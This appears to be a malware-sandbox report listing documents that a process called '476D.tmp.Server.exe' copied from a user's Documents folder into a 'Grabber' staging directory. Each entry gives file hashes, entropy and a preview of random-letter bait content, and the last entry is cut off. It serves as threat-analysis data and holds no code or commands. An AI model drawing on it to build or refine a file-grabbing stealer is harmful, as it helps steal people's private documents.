UCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
